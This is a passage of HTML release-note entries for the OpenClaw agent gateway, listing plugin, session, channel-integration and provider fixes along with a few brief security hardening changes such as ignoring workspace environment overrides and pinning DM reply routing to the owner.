<li>CLI/skills: show per-agent model and command visibility in <code>openclaw skills check --agent</code>, and let doctor report or disable unavailable skills allowed for the default agent. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368251753" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75983" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75983/hovercard" href="https://github.com/openclaw/openclaw/pull/75983">#75983</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mbelinky/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mbelinky">@mbelinky</a>.</li>
<li>Agents/runtime/tools: keep reply startup on Gateway metadata, manifest catalog rows, auth-store state, and plugin loader cache-key compatibility checks so scoped runtime registries, model allowlists, thinking metadata, media/PDF/generation tools, Comfy workflows, OpenAI Codex OAuth image generation, and image/video/music tool registration avoid broad provider/runtime loads while preserving explicit config and auth-backed providers. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Discord: document canonical mention formatting in agent prompt hints and channel docs so outbound replies use <code>&lt;@USER_ID&gt;</code>, <code>&lt;#CHANNEL_ID&gt;</code>, and <code>&lt;@&amp;ROLE_ID&gt;</code> instead of legacy nickname mentions. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4359907332" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75173" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75173/hovercard" href="https://github.com/openclaw/openclaw/pull/75173">#75173</a>)</li>
<li>Heartbeat scheduler: gate exec-event/notification/spawn/retry wakes through a centralized cooldown so backgrounded <code>process.start</code> exit notifications can no longer self-feed runaway heartbeat runs (configured <code>every: "30m"</code> was firing every ~10s in production, pegging the gateway event loop with <code>eventLoopDelayMaxMs &gt;6s</code> spikes that stalled control-UI asset serving and TUI handshakes). Documented wake-now paths (<code>manual</code>, <code>wake</code>, task completion, blocked-task follow-up, <code>/hooks/wake mode=now</code>, and cron <code>--wake now</code>) remain immediate; retryable busy skips no longer poison the cooldown for the next retry; per-agent flood guard caps any unexpected feedback loop at 5 runs/60s. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4236016269" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64016" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64016/hovercard" href="https://github.com/openclaw/openclaw/issues/64016">#64016</a>, refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3946045245" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/17797" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/17797/hovercard" href="https://github.com/openclaw/openclaw/issues/17797">#17797</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362911805" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75436" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75436/hovercard" href="https://github.com/openclaw/openclaw/issues/75436">#75436</a>) Thanks @hexsprite.</li>
<li>fix: block workspace CLOUDSDK_PYTHON override and always set trusted interpreter for gcloud. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4352375218" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74492" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74492/hovercard" href="https://github.com/openclaw/openclaw/pull/74492">#74492</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pgondhi987/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pgondhi987">@pgondhi987</a>.</li>
<li>Providers/Z.AI: move the bundled GLM catalog and auth env metadata into the plugin manifest, so <code>models list --all --provider zai</code> shows the full known catalog without duplicated runtime seed data. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Providers/Qianfan and Providers/Stepfun: declare setup auth metadata (<code>api-key</code> method, <code>QIANFAN_API_KEY</code>, <code>STEPFUN_API_KEY</code>) in the plugin manifest so onboarding and <code>models setup</code> surface the expected env var without falling back to legacy <code>providerAuthEnvVars</code> runtime seed data. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>fix(infra): block ambient Homebrew env vars from brew resolution. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4351948564" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74463" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74463/hovercard" href="https://github.com/openclaw/openclaw/pull/74463">#74463</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pgondhi987/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pgondhi987">@pgondhi987</a>.</li>
<li>Onboarding/configure: avoid staging every default plugin runtime dependency after config writes, so skipped setup flows only prepare config-selected plugin deps instead of pulling broad feature-plugin packages. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Thinking/providers: resolve bundled provider thinking profiles through lightweight provider policy artifacts when startup-lazy providers are not active, so OpenAI Codex GPT-5.x keeps xhigh available in Gateway session validation. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355122984" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74796" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74796/hovercard" href="https://github.com/openclaw/openclaw/issues/74796">#74796</a>. Thanks @maxschachere.</li>
<li>Security/Windows: ignore workspace <code>.env</code> system-path variables and resolve stale-process <code>taskkill.exe</code> from the validated Windows install root, preventing repository-local env files from redirecting cleanup helpers. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pgondhi987/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pgondhi987">@pgondhi987</a>.</li>
<li>CLI/plugins: refresh persisted plugin registry policy in place for <code>plugins enable</code> and <code>plugins disable</code>, so routine toggles no longer rebuild and hash every plugin source when the target is already indexed. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Windows/install: run npm from a writable installer temp directory and pin the Bedrock runtime dependency below a Windows ARM Node 24 npm resolver failure, so global OpenClaw installs no longer fail before onboarding. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mariozechner/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mariozechner">@mariozechner</a>.</li>
<li>CLI/plugins: scope install and enable slot selection to the selected plugin manifest/runtime fallback, so plugin installs no longer load every plugin runtime or broad status snapshot just to update memory/context slots. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/TTS: keep bundled speech-provider discovery available on cold package Gateway paths and add bundled plugin matrix runtime probes for health, readiness, RPC, TTS discovery, and post-ready runtime-deps watchdog coverage. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361552521" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75283" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75283/hovercard" href="https://github.com/openclaw/openclaw/issues/75283">#75283</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Google Meet/Twilio: show delegated voice call ID, DTMF, and intro-greeting state in <code>googlemeet doctor</code>, and avoid claiming DTMF was sent when no Meet PIN sequence was configured. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332551182" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72478" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72478/hovercard" href="https://github.com/openclaw/openclaw/issues/72478">#72478</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DougButdorf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DougButdorf">@DougButdorf</a>.</li>
<li>Plugins/tools: prefer built bundled plugin code during tool discovery and skip channel runtime hydration while preserving companion provider registrations, reducing per-run plugin-tool prep cost without dropping executable plugin tools. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361658522" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75290" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75290/hovercard" href="https://github.com/openclaw/openclaw/issues/75290">#75290</a>. Thanks @thanos-openclaw.</li>
<li>Plugins/loader: scope plugin-tool registry reuse to the enabled plugin plan and stored Gateway method keys, so embedded runner tool lookup can reuse compatible startup registries without hiding enabled non-startup plugin tools. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363466995" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75520" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75520/hovercard" href="https://github.com/openclaw/openclaw/issues/75520">#75520</a>. Thanks @whtoo.</li>
<li>Voice Call/Twilio: send notify-mode initial TwiML directly in the outbound create-call request while keeping conversation and pre-connect DTMF calls webhook-driven, so one-shot notify calls do not depend on a first-answer webhook fetch. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4335052780" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72758" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72758/hovercard" href="https://github.com/openclaw/openclaw/pull/72758">#72758</a>. Thanks @tyshepps.</li>
<li>Discord/Slack: defer status-reaction cleanup until run finalization so queued, thinking, tool, and terminal reactions no longer flicker during normal progress updates. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363934911" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75582" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75582/hovercard" href="https://github.com/openclaw/openclaw/pull/75582">#75582</a>)</li>
<li>Discord/voice: leave voice off for text-only configs unless explicitly configured, rerun configured voice auto-join after gateway RESUMED events, ignore already-destroyed stale voice connections during reconnect cleanup, lengthen the default voice join Ready wait with configurable timeouts, merge configured media-understanding providers such as Deepgram into partial active registries, apply per-channel <code>systemPrompt</code> overrides to voice transcript turns, and run voice-channel turns under a voice-output policy that hides the agent <code>tts</code> tool. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345485387" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73753" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73753/hovercard" href="https://github.com/openclaw/openclaw/issues/73753">#73753</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4043554548" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/40665" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/40665/hovercard" href="https://github.com/openclaw/openclaw/issues/40665">#40665</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4223830724" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63098" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63098/hovercard" href="https://github.com/openclaw/openclaw/issues/63098">#63098</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4251059736" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65687" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65687/hovercard" href="https://github.com/openclaw/openclaw/issues/65687">#65687</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4077930512" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/47095" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/47095/hovercard" href="https://github.com/openclaw/openclaw/issues/47095">#47095</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4208687812" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61536" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/61536/hovercard" href="https://github.com/openclaw/openclaw/issues/61536">#61536</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347706250" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74044" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74044/hovercard" href="https://github.com/openclaw/openclaw/issues/74044">#74044</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4041199935" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/39825" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/39825/hovercard" href="https://github.com/openclaw/openclaw/issues/39825">#39825</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4245973986" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65039" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65039/hovercard" href="https://github.com/openclaw/openclaw/issues/65039">#65039</a>. Thanks @sanchezm86, @SecureCloudProjO, @liz709, @darealgege, @kzicherman, @ayochim, @OneMintJulep, @qearlyao, and @aounakram.</li>
<li>Plugins/CLI: reuse the cold manifest registry while building plugin status and inspect reports, so large configured plugin sets no longer rediscover the bundled/plugin registry once per inspect row. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Gateway/health: refresh cached health RPC snapshots when channel runtime state diverges, so Discord and other channel status reads no longer report stale running or connected values until the cache TTL expires. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362790644" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75423" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75423/hovercard" href="https://github.com/openclaw/openclaw/pull/75423">#75423</a>)</li>
<li>Gateway/sessions: keep session-store reads from running stale prune and entry-count cap maintenance during startup, so oversized stores no longer block chat history readiness after updates while writes and <code>sessions cleanup --enforce</code> still preserve the cleanup safeguards. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4307434486" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70050" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70050/hovercard" href="https://github.com/openclaw/openclaw/issues/70050">#70050</a>. Thanks @tangda18.</li>
<li>Security/audit: keep plain <code>security audit</code> on the cold config/filesystem path and reserve plugin runtime security collectors for <code>--deep</code>, so large plugin installs cannot execute every plugin runtime during routine audits. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>WhatsApp: stage <code>qrcode</code> through root mirrored runtime dependencies so packaged QR pairing can render from staged plugin-runtime-deps installs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362623764" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75394" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75394/hovercard" href="https://github.com/openclaw/openclaw/issues/75394">#75394</a>. Thanks @FelipeX2001.</li>
<li>Interactive channel payloads: send Discord component-only interaction replies, Slack block-only slash replies, Telegram button/select fallback labels, and LINE quick-reply fallback option text instead of accepting empty renderable payloads. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Auto-reply/docking: require <code>/dock-*</code> route switches to start from direct chats, so group or channel participants cannot reroute a shared session's future replies into a linked DM. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Discord: keep text-DM main-session route updates pinned to the configured DM owner, matching component interactions so another direct-message sender cannot redirect future main-session replies. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Mattermost/Matrix: keep direct-message main-session route updates pinned to the configured DM owner so paired or temporarily allowed senders cannot redirect future shared-session replies. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Discord: keep SecretRef-backed bot tokens discoverable for message actions without resolving the token during schema generation, and resolve scoped channel SecretRefs before outbound agent message sends even when the tool is built from a config snapshot. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362174273" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75324" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75324/hovercard" href="https://github.com/openclaw/openclaw/issues/75324">#75324</a>. Thanks @slideshow-dingo and @Conan-Scott.</li>
<li>Updates: run package post-install doctor repair with the managed Gateway service profile and state paths when a daemon is installed, so shell/profile mismatches no longer repair the caller state while the restarted Gateway keeps stale config. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Models/DeepInfra: declare DeepInfra manifest catalog discovery and derive its runtime fallback catalog from the manifest, restoring provider-filtered <code>models list --all --provider deepinfra</code> rows without duplicated static model data. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>CLI/update: verify managed gateway restarts against the installed service port instead of the caller shell port, so package updates do not report a healthy daemon as failed when profiles use different gateway ports. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Gateway/agent: reject strict <code>openclaw agent --deliver</code> requests with missing delivery targets before starting the agent run, so users do not wait for a completed turn that cannot send anywhere. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Setup/import: honor non-interactive <code>--import-from</code> onboarding flags by running the migration import path instead of silently completing normal setup without importing anything. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Doctor/plugins: keep plain <code>doctor --non-interactive</code> from installing bundled plugin runtime dependencies, so headless health checks report missing deps while <code>doctor --fix</code> remains the explicit repair path. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Doctor/gateway: require an interactive confirmation before installing or rewriting the Gateway service, so <code>doctor --fix --non-interactive</code> can repair plugin/config drift without replacing the operator's launchd/systemd service from a temporary environment. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/runtime-deps: include packaged OpenClaw identity in bundled plugin loader cache keys, so same-path package upgrades stop reusing stale versioned runtime-deps mirrors. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4357604708" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75045" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75045/hovercard" href="https://github.com/openclaw/openclaw/issues/75045">#75045</a>. Thanks @sahilsatralkar.</li>
<li>Plugin SDK: restore reply-prefix and reply-pipeline helpers on the deprecated root/compat SDK surface so external plugins still using <code>openclaw/plugin-sdk</code> do not fail message dispatch after update. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4359892122" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75171" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75171/hovercard" href="https://github.com/openclaw/openclaw/issues/75171">#75171</a>. Thanks @zhangxiliang.</li>
<li>Plugins/runtime-deps: prune inactive same-package versioned runtime-deps roots after bundled dependency repair, so upgrades do not leave old <code>openclaw-&lt;version&gt;-&lt;hash&gt;</code> package caches behind after doctor runs. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/runtime-deps: prune legacy version-scoped plugin runtime-deps roots during bundled dependency repair and cover the path in Package Acceptance's upgrade-survivor matrix, so upgrades from 2026.4.x no longer leave stale per-plugin runtime trees after doctor runs. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/runtime-deps: keep Gateway startup plugin imports and runtime plugin fallback loads verify-only after startup/config repair planning, so packaged installs no longer spawn package-manager repair from hot paths after readiness. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361552521" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75283" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75283/hovercard" href="https://github.com/openclaw/openclaw/issues/75283">#75283</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4357974990" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75069" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75069/hovercard" href="https://github.com/openclaw/openclaw/issues/75069">#75069</a>. Thanks @brokemac79 and @xiaohuaxi.</li>
<li>Plugins/runtime-deps: treat package.json runtime-deps manifests as supersets when generated materialization metadata is absent, so bundled plugin activation stops restaging already-installed dependency subsets on every activation. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362879118" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75429" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75429/hovercard" href="https://github.com/openclaw/openclaw/issues/75429">#75429</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362889795" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75431" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75431/hovercard" href="https://github.com/openclaw/openclaw/pull/75431">#75431</a>) Thanks @loyur.</li>
<li>iMessage: add stdin write callback and error listener to IMessageRpcClient so async EPIPE from a closed child process rejects the pending request instead of crashing the gateway with uncaughtException. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362994855" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75438" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75438/hovercard" href="https://github.com/openclaw/openclaw/issues/75438">#75438</a>.</li>
<li>MCP/stdio: settle MCP stdio transport send() from the write callback instead of resolving immediately on buffer acceptance, so async write errors reject the promise instead of being lost. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362994855" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75438" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75438/hovercard" href="https://github.com/openclaw/openclaw/issues/75438">#75438</a>.</li>
<li>Process/exec: add stdin error listener in runCommandWithTimeout so EPIPE from a prematurely-exited child is swallowed instead of escaping to uncaughtException. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362994855" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75438" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75438/hovercard" href="https://github.com/openclaw/openclaw/issues/75438">#75438</a>.</li>
<li>Voice Call/realtime: add default-off fast memory/session context for <code>openclaw_agent_consult</code>, giving live calls a bounded answer-or-miss path before the full agent consult. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329662019" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71849" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71849/hovercard" href="https://github.com/openclaw/openclaw/issues/71849">#71849</a>. Thanks @amzzzzzzz.</li>
<li>Google Meet: interrupt Realtime provider output when local barge-in clears playback, so command-pair audio stops model speech instead of only restarting Chrome playback. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4346767837" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73850" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73850/hovercard" href="https://github.com/openclaw/openclaw/issues/73850">#73850</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4346567653" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73834" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73834/hovercard" href="https://github.com/openclaw/openclaw/pull/73834">#73834</a>) Thanks @shhtheonlyperson.</li>
<li>Gateway/config: cap oversized plugin-owned schemas in the full <code>config.schema</code> response so large installed plugin sets cannot balloon Gateway RSS or crash schema clients. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/update: skip ClawHub and marketplace plugin updates when the bundled version is newer than the recorded installed version, so <code>openclaw update</code> no longer overwrites working bundled plugins with older external packages. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363046993" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75447" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75447/hovercard" href="https://github.com/openclaw/openclaw/issues/75447">#75447</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</li>
<li>Gateway/sessions: use bounded tail reads for sessions-list transcript usage fallbacks and cap bulk title/last-message hydration, keeping large session stores responsive when rows request derived previews. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Gateway/sessions: yield during bulk transcript title/preview hydration and copy compaction checkpoints asynchronously, keeping the Gateway event loop responsive for large session stores and large transcripts. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362222686" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75330" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75330/hovercard" href="https://github.com/openclaw/openclaw/issues/75330">#75330</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362708402" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75414" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75414/hovercard" href="https://github.com/openclaw/openclaw/issues/75414">#75414</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</li>
<li>Gateway/sessions: stream bounded transcript reads for session detail, history, artifacts, compaction, and send/subscribe sequence paths so small Gateway requests no longer materialize large transcripts or OOM on oversized session logs. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
